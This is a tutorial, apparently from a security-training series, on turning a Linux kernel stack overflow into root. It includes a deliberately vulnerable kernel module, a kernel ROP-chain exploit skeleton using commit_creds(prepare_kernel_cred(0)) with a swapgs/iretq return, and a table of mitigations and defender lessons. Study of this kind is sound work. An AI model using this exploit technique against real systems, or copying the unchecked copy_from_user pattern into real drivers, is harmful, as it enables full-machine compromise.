Kernel Exploitation: From a Bug to root
A kernel memory-corruption bug is about privilege, not a shell. The credential model, the commit_creds(prepare_kernel_cred(0)) payload, and returning cleanly to userspace — in a lab VM.
This is the first walkthrough in the Kernel Exploitation area. Everything you learned in the x86-64 and ARM64 areas about overflows and control-flow hijacking still applies — but the target is the operating-system kernel, and the prize is not a shell, it is privilege.
Kernel bugs crash the whole machine, not one process. Do this only in a disposable virtual machine you can revert, against a kernel module you wrote. A panic is expected and normal while developing an exploit. See the lab rules.
The model: ring 3 asks, ring 0 acts
User programs (ring 3) cannot touch hardware or other processes' memory directly. They ask the kernel (ring 0) to act on their behalf through system calls. The kernel runs with full privilege and can see every process's memory. A memory-corruption bug reachable from a syscall therefore gives an attacker code execution in the most privileged context on the machine.
The attacker already runs code as an unprivileged user. The question is only how to turn a kernel bug into root.
How the kernel represents privilege
Every task has a struct cred holding its uid, gid and capabilities. Root is simply a cred with uid == 0 and full capabilities. Linux exposes two functions that, together, are the privilege-escalation primitive:
prepare_kernel_cred(0)allocate a fresh cred with root idscommit_creds(cred)install it on the current taskreturn to userspaceswapgs ; iretq back to ring 3execve("/bin/sh")a root shellIf we can make the kernel execute commit_creds(prepare_kernel_cred(0)), the process that entered the kernel becomes root. Then we return to userspace and run a shell.
The target: a vulnerable kernel module
CTF and practice kernels ship a deliberately vulnerable Loadable Kernel Module (LKM) exposing a device with a bug. A minimal stack overflow via a write handler:
/* vuln.c — a deliberately vulnerable LKM (lab only). */
static ssize_t vuln_write(struct file *f, const char __user *buf,
size_t len, loff_t *off) {
char local[64];
copy_from_user(local, buf, len); /* the bug: len is attacker-controlled */
return len;
}
copy_from_user(local, buf, len) with an attacker-controlled len overflows the 64-byte kernel-stack buffer — the stack overflow you already know, but on the kernel stack, overwriting a saved return address that the CPU will follow in ring 0.
The exploit shape
/* exploit.c — runs as an unprivileged user in the lab VM. */
// 1) Save userspace state to return to after the privesc.
save_state(); // stash user cs, ss, rsp, rflags via inline asm
// 2) Build a kernel ROP chain in the overflow that runs:
// rdi = 0; call prepare_kernel_cred
// rdi = rax; call commit_creds
// swapgs; iretq -> back to user shell()
unsigned long payload[N];
size_t i = OFFSET / 8; // offset to the saved return address
payload[i++] = pop_rdi; payload[i++] = 0;
payload[i++] = prepare_kernel_cred;
payload[i++] = pop_rdi_from_rax_trampoline; // move rax -> rdi
payload[i++] = commit_creds;
payload[i++] = swapgs_ret;
payload[i++] = iretq;
payload[i++] = (unsigned long)shell; // saved RIP
payload[i++] = user_cs; payload[i++] = user_rflags;
payload[i++] = user_sp; payload[i++] = user_ss;
int fd = open("/dev/vuln", O_RDWR);
write(fd, payload, sizeof(payload)); // trigger the overflow
// after iretq we land in shell() as root:
void shell(void){ if (getuid()==0) system("/bin/sh"); }
Kernel symbol addresses (prepare_kernel_cred, commit_creds) come from /proc/kallsyms on an unhardened kernel, or a leak (the next guides cover when they are hidden). The result:
$ ./exploit
[*] saved user state
[*] triggering overflow...
# id
uid=0(root) gid=0(root) groups=0(root)
Turn the mitigations back on
Each kernel mitigation removes one convenience this exploit relied on:
| Mitigation | Effect on this exploit |
|---|---|
kptr_restrict / dmesg_restrict | Hides /proc/kallsyms and log pointers — you must leak symbol addresses |
| KASLR | Randomizes the kernel base; one leak derandomizes the whole image |
Kernel stack canary (CONFIG_STACKPROTECTOR) | Detects the stack overflow before the return |
| SMEP / SMAP | Stop the kernel executing or reading userspace — the next guide |
| KPTI | Unmaps the kernel from user page tables — the third guide |
What this teaches a defender
- A kernel bug is a full-machine compromise. There is no privilege boundary above root. Treat any kernel-reachable memory-corruption bug as maximum severity, including in drivers and out-of-tree modules.
- Attack surface is the lever. Most kernel LPEs are in drivers, filesystems and niche syscalls, not core code. Reducing reachable surface (seccomp,
lockdown, disabling unused modules) removes whole bug classes from reach. - Enable the config options.
CONFIG_STACKPROTECTOR_STRONG, KASLR, SMEP/SMAP, and the hardening in the third guide are the kernel equivalents of the userland flags in binary hardening flags.
Key takeaways
- Kernel exploitation turns a syscall-reachable memory bug into privilege, not a shell.
- Privilege lives in
struct cred;commit_creds(prepare_kernel_cred(0))makes the current task root. - After the privesc you must return to ring 3 with saved user state via
swapgs ; iretq. - Work only in a revertible VM; the mitigations that follow (SMEP, SMAP, KASLR, KPTI) each remove a step this relied on.
Next: ret2usr, SMEP and SMAP, the defences that stop the kernel from trusting userspace memory.